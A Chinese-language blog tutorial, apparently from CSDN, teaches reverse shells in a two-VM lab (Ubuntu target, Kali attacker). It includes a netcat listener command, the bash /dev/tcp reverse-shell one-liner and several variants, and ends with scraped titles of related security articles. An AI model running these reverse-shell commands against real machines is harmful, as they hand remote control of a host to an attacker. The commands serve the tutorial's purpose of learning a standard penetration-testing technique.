反弹shell 之最终篇 实战远操
反弹shell讲解
- 今天进行实战远程操控
- 一.条件:
- 二.如果想要测试需要准备的相关材料
- 三.思路指导
- 四. 实战演练
- 五.其他的shell语句:
- 六.总结
今天进行实战远程操控
一.条件:
1 | 我们可以对被攻击者的电脑进行命令执行 |
---|---|
2 | 被攻击者电脑上0,1,2各项权限不曾更改,或者更改你知道后续情况 |
二.如果想要测试需要准备的相关材料
1.两台不同ip的机器:
我这里准备的是一台Ubuntu 虚拟机(被攻击者)
ip:192.168.123.137(ifconfig即可查询)
一台kali linux虚拟机(攻击者)
ip:192.168.123.107(ifocnfig即可查询)
2.了解基本的nc军刀命令
我之前写过一篇博客(只针对本次测试的nc命令讲解):
https://blog.csdn.net/weixin_44270509/article/details/90272332
3.了解linux0,1,2各项权限的内容和重定向的有关知识
不了解的可以看看我之前的博客:
https://blog.csdn.net/weixin_44270509/article/details/90260012
4.一些shell的功能(我下文思路指导也会讲出该功能的用途)
三.思路指导
1.我们需要了解反弹shell的基本内容:
reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
入何实现这个呢:
.我们需要在攻击者机器上先执行监听端口动向,从而第一时间获取信息
.我们需要在被攻击者的机器上执行重定向权限设置,将读写的权限转交到攻击者的电脑上
.我们需要一个多命令权限转交的中转,这就需要引用linux 再带的shell中的权限了
2.linux shell的主要内容:
Shell本身是一个用C语言编写的程序,它是用户使用Unix/Linux的桥梁,用户的大部分工作都是通过Shell完成的。Shell既是一种命令语言,又是一种程序设计语言。作为命令语言,它交互式地解释和执行用户输入的命令;作为程序设计语言,它定义了各种变量和参数,并提供了许多在高级语言中才具有的控制结构,包括循环和分支。
Unix/Linux上常见的Shell脚本解释器有bash、sh、csh、ksh等,习惯上把它们称作一种Shell。
这次我们主要使用bash shell
我们先主要了解这个shell:
linux里面的自带shell,bash是 Bourne Again Shell 的缩写,是linux标准的默认shell ,它基于Bourne shell,吸收了C shell和Korn shell的一些特性。bash完全兼容sh,也就是说,用sh写的脚本可以不加修改的在bash中执行。因为是默认的shell,所以基本上百分之九十的linux系统都存在,也是我们这次演练的原因
当然如果你想了解更多
四. 实战演练
首先我们在攻击者系统上执行可以进行监控端口的指令,主要是nc命令的显现:
首先我们先来准备一下命令:
nc -lvp 2233
会出现下面的样式
然后我们在被攻击的系统上执行我们(如果看不到下面的命令请务必查看我上面指向的博客了解)
bash -i>& /dev/tcp/192.168.123.107/2233 0>&1
我们来看一下效果
好像没有什么变化,但是我们在看我们攻击者的电脑上的变化,我顺便执行了一条ip查询指令:
然而查询出的ip确是
然后我们尝试在被攻击的电脑上执行命令
然而我们发现,无论是什么指令都没有什么显示,为什么呢,这就归功于我们之前的nc命令的功劳,如果到这你都好没有看我之前的博客,我就只能滑稽护体了
我们在攻击者的电脑上执行下之前命令
发现之前的命令都有显示,太真实了,因为我们把0,1,2都重定向到了攻击者的电脑上了啦…
五.其他的shell语句:
1 | bash -i>& /dev/tcp/192.168.146.129/2333 0<&1 |
---|---|
2 | bash -i >& /dev/tcp/192.168.146.129/2333 <&2 |
与2等价 | bash -i >& /dev/tcp/192.168.146.129/2333 0<&2 |
3 | exec 5<>/dev/tcp/192.168.146.129/2333;cat <&5 |
六.总结
到此总结反弹shell就结束了,毕竟这是我一个人学习的经验,我希望如果我有错误大家可以及时评论指出,我好及时更正,谢谢
反弹shell 之最终篇 实战远操相关推荐
- 渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Windows篇(゚益゚メ) 渗透测试
文章目录 反弹shell介绍 常用反弹方式 NetCat(NC)反弹 正向NC 反向NC mshta.exe利用 msf利用模块 方法一(msfconsole) 方法二(msfvenom) Cobal ...
- Silverlight+WCF 实战-网络象棋最终篇之对战视频-下篇[客户端发送与服务端中转](六)...
本篇继上一篇:Silverlight+WCF 实战-网络象棋最终篇之对战视频-上篇[客户端开启视频/注册编号/接收视频](五) 一:对战视频 简单原理 略,内容见上篇. 二:对战视频 步骤解析: 略 ...
- Silverlight+WCF 实战-网络象棋最终篇之对战视频-上篇[客户端开启视频/注册编号/接收视频](五)...
前言: 近期在忙点"秋色园"的事情,所以网络象棋这一块文章就写的相对慢,而且刚好接上篇:Silverlight+WCF 实战-网络象棋最终篇之非线程阻塞倒计时窗口(四) 之后, ...
- [网络安全自学篇] 五十八.Windows安全缺陷利用之再看CVE-2019-0708及反弹shell防御措施
很早之前,我分享过一篇名叫 "四十四.Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解" 的博客,主要采用Python代码让目标XP系统蓝屏.当时也阅读了很多 ...
- [网络安全自学篇] 五十三.Windows系统安全之Metasploit实现栈溢出攻击及反弹shell原理解析
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了虚拟机基础知识,包括XP操作系统安装.文件共享设置.网络快照及网络设置 ...
- ac2100 反弹shell无法粘贴_手把手带你玩转NAS 篇二十一:小米Redmi AC2100路由器刷机padavan保姆级教程...
手把手带你玩转NAS 篇二十一:小米Redmi AC2100路由器刷机padavan保姆级教程 2020-05-14 18:49:24 224点赞 1790收藏 241评论 你是AMD Yes党?还是 ...
- 渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
文章目录 相关博客 反弹shell介绍 常用反弹方式 NetCat(NC)反弹 正向NC 反向NC Telnet反弹 正向shell 反向shell OpenSSL Curl 相关博客 Linux信息 ...
- 【转】反弹Shell,看这一篇就够了
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹个shell是再常见不过的事情了. 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到 ...
- linux 下ssh端口反弹,利用ssh隧道反弹shell
说明 本文旨在分析rssh的源代码来学习利用ssh隧道来反弹shell.整个rssh只有1个347行的main文件,所以整体的逻辑结构也比较好分析.关于SSH端口转发的知识可以看实战SSH端口转发这篇 ...
最新文章
- 2.aop中几个注解的含义
- python怎么读文件夹下的文件夹-python如何获取当前文件夹下所有文件名详解
- 麦克纳姆轮运动原理_麦克纳姆轮介绍
- jQuery源码分析系列 : 整体架构
- pet shop学习.
- 【QGIS入门实战精品教程】4.5:QGIS打开Excel中的点坐标,并生成矢量文件
- Linux CentOS 7 安装 Redis
- iOS 中关于 skip install
- 混过了2015,依然不知道你要什么?
- GoDiagram可以画节点和连线的WinForms
- openwrt 需要高级浏览器_树莓派 + OpenWrt 实现 BT 下载机
- 如何用GoldWave生成音频的回音效果
- QQ游戏可以进房间,但上不了桌,无法入坐的一次解决经历
- hypervisor详解
- 微信忘记支付密码,实名认证的身份证又没有办理银行卡怎么破?(未解决)
- WAV文件格式解析及处理
- 修复共享服务器,集群服务器共享磁盘柜的修复案例
- 在RT-Thread STM32F407平台下配置SPI flash为U盘
- 读取nas_最便宜的万兆NAS解决方案—威联通TS-532X
- 桶排序+睡眠排序python
热门文章
- linux报错:Please do not use uppercase letters in hostname: VM-0-10-centos
- 2021_lg_04.sql_2021窗口函数的使用与偏移函数在日期资金上的使用案例代码
- 目标检测论文笔记二:CenterNet《Objects as Points》
- 麒麟信安携手中望软件打造全国产操作系统+CAD解决方案
- Flash 8 形状补间动画详解及实例
- 安装的oracle打不开,关于安装ORACLE 10的问题,打不开,急!!
- 【原创】村里有个姑娘叫小芳
- day17-面向对象和json
- 【香水】香水新手入门
- 台湾大学林轩田《机器学习基石》学习笔记第6讲——Theory of Generalization